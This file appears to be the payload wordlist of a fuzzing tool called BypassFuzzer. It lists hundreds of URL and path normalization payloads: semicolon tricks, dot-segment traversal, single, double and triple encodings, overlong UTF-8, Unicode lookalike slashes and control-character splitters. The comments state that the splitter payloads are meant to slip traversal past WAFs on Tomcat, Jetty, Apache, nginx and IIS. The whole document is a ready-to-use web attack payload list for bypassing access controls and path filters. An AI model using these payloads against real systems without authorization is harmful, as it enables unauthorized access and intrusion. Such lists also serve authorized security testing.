# ==============================================================================
# BypassFuzzer — URL / Path Normalization Payloads
# Lines starting with '#' are ignored. Blank lines are ignored.
# Each payload is wrapped into every path segment by UrlPayloadProcessor
# (prefix, suffix, and both) so keep payloads minimal — don't pre-pad them.
# ==============================================================================

# ------------------------------------------------------------------------------
# Semicolon / matrix-parameter tricks (Tomcat, Jetty, Spring, Undertow)
# ------------------------------------------------------------------------------
;
;?
;/
;/.;.
;/..
;/..;
;/../
;/../;/
;/../;/../
;/../.;/../
;/../../
;/../..//
;/.././../
;/..//
;/..//../
;/..///
;/..//%2e%2e/
;/..//%2E%2E/
;/..//%2f
;/..//%2F
;/../%2f/
;/../%2F/
;/..%2f
;/..%2F
;/..%2f..%2f
;/..%2F..%2F
;/..%2f/
;/..%2F/
;/..%2f//
;/..%2F//
;/..%2f%2e%2e%2f
;/..%2F%2E%2E%2F
;/..%2f%2f../
;/.%2e
;/.%2E
;/.%2e/%2e%2e/%2f
;/.%2E/%2E%2E/%2F
;//
;//..
;//../../
;///..
;///../
;///..//
;//%2f../
;//%2F../
;/%2e.
;/%2E.
;/%2e%2e
;/%2E%2E
;/%2e%2e/
;/%2E%2E/
;/%2e%2e%2f/
;/%2E%2E%2F/
;/%2e%2e%2f%2e%2e%2f
;/%2E%2E%2F%2E%2E%2F
;/%2e%2e%2f%2f
;/%2E%2E%2F%2F
;/%2f/../
;/%2F/../
;/%2f/..%2f
;/%2F/..%2F
;/%2f%2f../
;/%2F%2F../
;/%2e%2e%2f..%2f
;/%2E%2E%2F..%2F
;%09
;%09;
;%09..
;%09..;
;%2f;/;/..;/
;%2F;/;/..;/
;%2f;//../
;%2F;//../
;%2f..
;%2F..
;%2f..;/;//
;%2f..;//;/
;%2f..;///
;%2f../;/;/
;%2f../;/;/;
;%2f../;//
;%2f..//;/
;%2f..//;/;
;%2f..//../
;%2f..//..%2f
;%2f..///
;%2f..///;
;%2f../%2f../
;%2f../%2f..%2f
;%2f..%2f..%2f%2f
;%2f..%2f/
;%2f..%2f/../
;%2f..%2f/..%2f
;%2f..%2f%2e%2e%2f%2f
;%2F..%2F%2E%2E%2F%2F
;%2f/;/..;/
;%2F/;/..;/
;%2f/;/../
;%2f//..;/
;%2f//../
;%2f//..%2f
;%2F//..%2F
;%2f/%2f../
;%2F/%2F../
;%2f%2e%2e
;%2F%2E%2E
;%2f%2e%2e%2f%2e%2e%2f%2f
;%2F%2E%2E%2F%2E%2E%2F%2F
;%2f%2f/../
;%2F%2F/../

# ------------------------------------------------------------------------------
# Query / fragment terminator probes
# ------------------------------------------------------------------------------
?
?;
??
?#
#
#?

# ------------------------------------------------------------------------------
# Dot-segment normalization
# ------------------------------------------------------------------------------
.
.;
..
..;\
..;\;
..;%00/
..;%0d/
..;%0D/
..;%ff/
..;%FF/
../
..\
..\;
..%00;/
..%00/
..%00/;
..%01
..%09
..%0a
..%0A
..%0d
..%0D
..%0d;/
..%0D;/
..%0d/
..%0D/
..%0d/;
..%0D/;
..%5c
..%5C
..%5c/
..%5C/
..%5c..%5c
..%5C..%5C
..\..\
..%ff;/
..%FF;/
..%ff/
..%FF/
..%ff/;
..%FF/;
./
.//
/./
/.//
.%00
.%00/

# ------------------------------------------------------------------------------
# Slash / leading-slash variants
# ------------------------------------------------------------------------------
/
/;
/;?
/;/
/;/../
/;/../;/
/;/../;/../
/;/../.;/../
/;/../../
/;/../..//
/;/.././../
/;/..//
/;/..//../
/;/..///
/;/..//%2e%2e/
/;/..//%2E%2E/
/;/..//%2f
/;/..//%2F
/;/../%2f/
/;/../%2F/
/;//
/;///
/?
/?;
/.
/.;
/.;/
/.;//
/..
/..;/
/..;/;/
/..;/;/..;/
/..;/..;/
/..;/../
/..;//
/..;//..;/
/..;//../
/..;%2f
/..;%2F
/..;%2f..;%2f
/..;%2F..;%2F
/..;%2f..;%2f..;%2f
/..;%2F..;%2F..;%2F
/..;/..;/..;/..;/
/..;/..;/..;/..;/..;/
/../
/../;/
/../;/../
/../.;/../
/../..;/
/../../
/../../../
/../../..//
/../..//
/../..//../
/.././../
/..//
/..//..;/
/..//../
/..//../../
/..%2f
/..%2F
/..%2f..%2f
/..%2F..%2F
/..%2f..%2f..%2f
/..%2F..%2F..%2F
/..%2f..%2f..%2f..%2f
/..%2F..%2F..%2F..%2F
/./
/.//
/.%00
/.%00/
//
//;
//;/
//.;/
//..
//..;
//../../
//./
///
///;
///;/
///..
///..;
///..;/
///..;//
///../
///..//
//%2f
//%2F
//%ef%bc%8f
//%EF%BC%8F

# Backslash paths (Windows / nginx edge cases)
\
\;
\..
\..\
\..\..
/\
/\..
/\..\
/..\
/..\..\

# ------------------------------------------------------------------------------
# Control / whitespace injection
# ------------------------------------------------------------------------------
/#
/%01
/%0a
/%0A
/%0b
/%0B
/%0c
/%0C
/%0d
/%0D
/%0d%0a
/%0D%0A
/%20
/%20#
/%20%23
/%23
/%09
/%09/
/%c2%a0
/%C2%A0
/%e2%80%8b
/%E2%80%8B

# ------------------------------------------------------------------------------
# Single-encoded dot / slash (with uppercase variants for case-sensitive decoders)
# ------------------------------------------------------------------------------
/%2e
/%2E
/%2e/
/%2E/
/%2e//
/%2E//
/%2e%2e
/%2E%2E
/%2e%2E
/%2E%2e
/%2e%2e/
/%2E%2E/
/%2e%2e%2f
/%2E%2E%2F
/%2e%2e%2f/
/%2E%2E%2F/
/%2e%2e%3b/
/%2E%2E%3B/
/%2e%2f/
/%2E%2F/
/%2e%3b/
/%2E%3B/
/%2e%3b//
/%2E%3B//
/%2f
/%2F
/%2f/
/%2F/
/%3b/
/%3B/

# ------------------------------------------------------------------------------
# Double-encoded (+ uppercase decoder-case variants — e.g. React %252F vs %252f)
# ------------------------------------------------------------------------------
/%252e
/%252E
/%252e/
/%252E/
/%252e%252e
/%252E%252E
/%252e%252e%252f/
/%252E%252E%252F/
/%252e%252e%253b/
/%252E%252E%253B/
/%252e%252f/
/%252E%252F/
/%252e%253b/
/%252E%253B/
/%252f
/%252F
/%252f%252f
/%252F%252F
%252f/
%252F/
%252f%252f
%252F%252F

# ------------------------------------------------------------------------------
# Triple-encoded (encoded-percent of encoded-percent of char)
# ------------------------------------------------------------------------------
/%25%32%65
/%25%32%66
/%25%32%65/
/%25%32%66/
/%25%32%65%25%32%65/
/%25%32%65%25%32%65%25%32%66/

# ------------------------------------------------------------------------------
# Other encoded probes (root, hash, null)
# ------------------------------------------------------------------------------
/%2500
/%2523
/%253b
/%253B
/%253f
/%253F
/%E5%98%8A
/%E5%98%8D
/%ef%bc%8f
/%EF%BC%8F
/%ef%bc%8f/
/%EF%BC%8F/

# IIS-style Unicode escape (legacy; %u + 4 hex digits)
/%u002e
/%U002E
/%u002e;
/%U002E;
/%u002e/%u002e
/%U002E/%U002E
/%u002e/%u002e;
/%u002f
/%U002F
/%u005c
/%U005C

# ------------------------------------------------------------------------------
# Bare single chars (at path root)
# ------------------------------------------------------------------------------
%01
%01;
%01..
%01/
%09
%09;
%09;/
%09..
%09..;
%09..;/
%09../
%09/
%09%3b
%09%3B
%0a
%0A
%0a;
%0a..
%0a/
%0b
%0B
%0c
%0C
%0d
%0D
%0d;
%0d..
%0d/
%0d%0a
%0D%0A
%20
%20;
%20/
%23
%23%3f
%23%3F

# ------------------------------------------------------------------------------
# Bare encoded dot / slash / backslash / semicolon
# ------------------------------------------------------------------------------
%2e
%2E
%2e;
%2E;
%2e;/
%2E;/
%2e;//
%2E;//
%2e;%2f
%2E;%2F
%2e;%2f%2f
%2E;%2F%2F
%2e/
%2E/
%2e//
%2E//
%2e%2e
%2E%2E
%2e%2E
%2E%2e
%2e%2e;
%2E%2E;
%2e%2e/
%2E%2E/
%2e%2e%2f
%2E%2E%2F
%2e%2f
%2E%2F
%2e%2f%2f
%2E%2F%2F
%2f
%2F
%2f;?
%2F;?
%2f?;
%2F?;
%2f/
%2F/
%2f//
%2F//
%2f/%2f
%2F/%2F
%2f/%ef%bc%8f
%2F/%EF%BC%8F
%2f%20%23
%2F%20%23
%2f%23
%2F%23
%2f%2f
%2F%2F
%2f%2f%2f
%2F%2F%2F
%2f%3b%2f
%2F%3B%2F
%2f%3b%2f%2f
%2F%3B%2F%2F
%2f%3f
%2F%3F
%2f%3f/
%2F%3F/
%2f%ef%bc%8f
%2F%EF%BC%8F
%2f%ef%bc%8f%2f
%2F%EF%BC%8F%2F
%5c
%5C
%5c%5c
%5C%5C
%255c
%255C

# ------------------------------------------------------------------------------
# Semicolon-prefixed encoded traversal
# ------------------------------------------------------------------------------
%3b
%3B
%3b/..
%3B/..
%3b//%2f../
%3B//%2F../
%3b/%2e.
%3B/%2E.
%3b/%2e%2e/..%2f%2f
%3B/%2E%2E/..%2F%2F
%3b/%2f%2f../
%3B/%2F%2F../
%3b%09
%3B%09
%3b%2f..
%3B%2F..
%3b%2f%2e.
%3B%2F%2E.
%3b%2f%2e%2e
%3B%2F%2E%2E
%3b%2f%2e%2e%2f%2e%2e%2f%2f
%3B%2F%2E%2E%2F%2E%2E%2F%2F
%3f%23
%3F%23
%3f%3f
%3F%3F

# ------------------------------------------------------------------------------
# Overlong UTF-8 — 2-byte (dot + slash + backslash)
# ------------------------------------------------------------------------------
%c0%ae
%C0%AE
%c0%ae%c0%ae
%C0%AE%C0%AE
%c0%ae%c0%ae%c0%af
%C0%AE%C0%AE%C0%AF
%c0%af
%C0%AF
%c0%af;%c0%af
%C0%AF;%C0%AF
%c0%af;%c0%af%c0%af
%C0%AF;%C0%AF%C0%AF
%c0%af.
%C0%AF.
%c0%af.;
%C0%AF.;
%c0%af.;%c0%af
%C0%AF.;%C0%AF
%c0%af.;%c0%af%c0%af
%C0%AF.;%C0%AF%C0%AF
%c0%af.%c0%af
%C0%AF.%C0%AF
%c0%af.%c0%af%c0%af
%C0%AF.%C0%AF%C0%AF
%c0%af%c0%af
%C0%AF%C0%AF
%c0%af%c0%af..
%C0%AF%C0%AF..
%c0%af%c0%af%c0%af
%C0%AF%C0%AF%C0%AF
%c0%ae%c0%ae%2f
%C0%AE%C0%AE%2F
%c0%80

# ------------------------------------------------------------------------------
# Overlong UTF-8 — 3-byte
# ------------------------------------------------------------------------------
%e0%80%ae
%E0%80%AE
%e0%80%af
%E0%80%AF
%e0%80%ae%e0%80%ae
%E0%80%AE%E0%80%AE
%e0%80%ae%e0%80%ae%e0%80%af
%E0%80%AE%E0%80%AE%E0%80%AF
%e0%80%af%e0%80%af
%E0%80%AF%E0%80%AF

# ------------------------------------------------------------------------------
# Overlong UTF-8 — 4-byte
# ------------------------------------------------------------------------------
%f0%80%80%ae
%F0%80%80%AE
%f0%80%80%af
%F0%80%80%AF
%f0%80%80%ae%f0%80%80%ae
%F0%80%80%AE%F0%80%80%AE
%f0%80%80%ae%f0%80%80%ae%f0%80%80%af
%F0%80%80%AE%F0%80%80%AE%F0%80%80%AF

# ------------------------------------------------------------------------------
# Unicode lookalikes (dot / slash / backslash)
# U+FF0E fullwidth full stop, U+FF0F fullwidth solidus,
# U+2215 division slash, U+2044 fraction slash, U+2216 set minus.
# ------------------------------------------------------------------------------
%ef%bc%8e
%EF%BC%8E
%ef%bc%8e%ef%bc%8e
%EF%BC%8E%EF%BC%8E
%ef%bc%8e%ef%bc%8e%ef%bc%8f
%EF%BC%8E%EF%BC%8E%EF%BC%8F
%ef%bc%8f
%EF%BC%8F
%ef%bc%8f;%ef%bc%8f
%EF%BC%8F;%EF%BC%8F
%ef%bc%8f.
%EF%BC%8F.
%ef%bc%8f.;
%EF%BC%8F.;
%ef%bc%8f.;%ef%bc%8f
%EF%BC%8F.;%EF%BC%8F
%ef%bc%8f.;%ef%bc%8f%ef%bc%8f
%EF%BC%8F.;%EF%BC%8F%EF%BC%8F
%ef%bc%8f.%ef%bc%8f
%EF%BC%8F.%EF%BC%8F
%ef%bc%8f.%ef%bc%8f%ef%bc%8f
%EF%BC%8F.%EF%BC%8F%EF%BC%8F
%ef%bc%8f%2f
%EF%BC%8F%2F
%ef%bc%8f%ef%bc%8f
%EF%BC%8F%EF%BC%8F
%ef%bc%8f%ef%bc%8f..
%EF%BC%8F%EF%BC%8F..
%ef%bc%8f%ef%bc%8f%ef%bc%8f
%EF%BC%8F%EF%BC%8F%EF%BC%8F
%e2%88%95
%E2%88%95
%e2%88%95%e2%88%95
%E2%88%95%E2%88%95
%e2%81%84
%E2%81%84
%e2%88%96
%E2%88%96

# ------------------------------------------------------------------------------
# Splitter via stripped control chars
# Payloads that collapse to '..' or '//' only AFTER the server decodes %-encoding
# and strips whitespace/control bytes. WAFs inspecting the raw or once-decoded
# form see no '..' / '%2e%2e' and miss the traversal.
# Works against: fetch()-style URL parsers (literal \t\n\r), Apache/Tomcat/Jetty
# post-decode normalizers that strip whitespace, custom middleware trim logic.
# ------------------------------------------------------------------------------

# Dot-splitter-dot (collapses to '..' after control-byte stripping)
%2e%09%2e
%2E%09%2E
%2e%0a%2e
%2E%0A%2E
%2e%0b%2e
%2E%0B%2E
%2e%0c%2e
%2E%0C%2E
%2e%0d%2e
%2E%0D%2E
%2e%20%2e
%2e%00%2e
%2e%c2%a0%2e
%2E%C2%A0%2E
%2e%e2%80%8b%2e
%2E%E2%80%8B%2E

# Full traversal with internal splitter
%2e%09%2e%2f
%2E%09%2E%2F
%2e%09%2e%5c
%2E%09%2E%5C
%2f%2e%09%2e%2f
%2F%2E%09%2E%2F
%2f%2e%09%2e%5c
%2F%2E%09%2E%5C
%2f%2e%09%2e%2f%2e%09%2e%2f
%2F%2E%09%2E%2F%2E%09%2E%2F
/.%09./
/.%0a./
/.%0A./
/.%0d./
/.%0D./
/.%20./
\.%09.\
/.%09.\
\.%09./

# Splitter between slashes / slash-backslash
%2f%09%2f
%2F%09%2F
%2f%09%5c
%2F%09%5C
%5c%09%2f
%5C%09%2F
%2f%0a%2f
%2F%0A%2F
%2f%0d%2f
%2F%0D%2F
/%09/
/%09\
\%09/

# Splitter adjacent to traversal token
%09..
%09..%2f
%09..%2F
..%09
..%09/
..%09%2f
..%09%2F
%2f%09..
%2F%09..
%2f..%09
%2F..%09
%2f..%09%2f
%2F..%09%2F
%2f..%09/..%09/
%2F..%09/..%09/

# Chained: full URL-shape bypass (variations of the quoted WAF-bypass payload)
%2f%2e%09%2e%5c%2e%09%2e
%2F%2E%09%2E%5C%2E%09%2E
%2f%2e%09%2e%2f%2e%09%2e%2f
%2F%2E%09%2E%2F%2E%09%2E%2F
